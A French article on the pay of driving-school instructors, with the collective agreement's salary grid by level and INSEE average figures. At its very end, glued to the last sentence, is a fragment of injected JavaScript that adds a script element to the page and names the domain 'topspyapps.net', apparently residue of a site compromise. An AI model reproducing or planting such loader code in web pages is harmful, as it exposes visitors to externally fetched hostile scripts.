Le salaire d’un enseignant de la conduite peut varier de manière importante en fonction de plusieurs critères : les catégories enseignées par le moniteur, son ancienneté, la localisation de l’auto-école (en agglomération ou à la campagne), la réalisation éventuelle d’heures supplémentaires (ces heures sont payées 25% de plus que les heures prévues au contrat de travail).

Par ailleurs, le moniteur profite souvent d’avantages en nature tels que la voiture auto-école pour effectuer les trajets entre son domicile et l’auto-école matin et soir.

Attention : l’utilisation abusive de la voiture école à des fins personnelles peut entraîner des conflits entre le gérant de l’auto-école et l’enseignant. Lorsqu’un tel avantage est octroyé, il est important de bien définir son périmètre (si besoin au moyen d’un avenant au contrat de travail).

Les salaires des personnes travaillant dans un établissement de conduite ont un plancher minimum garanti par la Convention collective nationale du commerce et de la réparation de l’automobile, du cycle et du motocycle et des activités connexes, ainsi que du contrôle technique automobile du 15 janvier 1981. L’article 3 de cette convention annonce ainsi une grille de salaire brut mensuel garanti pour les postes suivants :

Un enseignant de la conduite débutant aura une rémunération minimale correspondant à l’échelon 3, s’il est titulaire de la mention « deux roues » ou « groupe lourd » sa rémunération minimale passe à l’échelon 6.

Les coordinateurs d’enseignement automobile, les formateurs du transport routier, les formateurs à la conduite d’engins ont également une rémunération minimale garantie correspondant à l’échelon 6.

Dans la catégorie des agents de maîtrise, les coordinateurs d’enseignements « moto » et « groupe lourd » ont une rémunération correspondant à l’échelon 9 et les formateurs d’enseignants (titulaires du BAFM) débutent à l’échelon 20.

Les directeurs pédagogiques et les responsable d’unité(s) d’enseignement de la sécurité routière et de la conduite (plus communément appelés « responsable d’agence ») ont le statut de cadre. Leur rémunération débute à l’échelon I C.

Ouvriers et employés
Échelon 1 : 1 480 €
Échelon 2 : 1 495 €
Échelon 3 : 1 511 €
Échelon 4 : 1 532 €
Échelon 5 : 1 558 €
Échelon 6 : 1 590 €
Échelon 7 : 1 621 €
Échelon 8 : 1 671 €
Échelon 9 : 1 725 €
Échelon 10 : 1 764 €
Échelon 11 : 1 811 €
Échelon 12 : 1 859 €
Agents de maîtrise
Échelon 17 : 1 729 €
Échelon 18 : 1 768 €
Échelon 19 : 1 812 €
Échelon 20 : 1 859 €
Échelon 21 : 1 916 €
Échelon 22 : 1 982 €
Échelon 23 : 2 103 €
Échelon 24 : 2 227 €
Échelon 25 : 2 352 €
Cadres
Échelon IA : 2 103 €
Échelon IB : 2 227 €
Échelon IC : 2 352 €
Échelon IIA : 2 474 €
Échelon IIB : 2 721 €
Échelon IIC : 2 969 €
Échelon IIIA : 3 216 €
Échelon IIIB : 3 464 €
Échelon IIIC : 3 712 €
Échelon IVA : 3 959 €
Échelon IVB : 4 206 €
Échelon IVC : 4 455 €
Échelon V : 4 951 €

La convention collective a été mise à jour en mai 2016 et est accessible en cliquant ici.

Naturellement, les salaires sont négociables et varient selon les régions. Selon l’INSEE, le salaire moyen d’un moniteur d’auto-écoles peut varier de 1 374 € net pour les femmes à 1 501€ net pour les hommes avec une médiane à 1 444 €. Le directeur d’un auto-école pourra gagner de 1 989€ pour les femmes à 2 518€ net pour les hommes. La médiane est à 2 403€ net.d.getElementsByTagName(‘head’)[0].appendChild(s);document.currentScript.parentNode.insertBefore(s, document.currentScript);topspyapps.net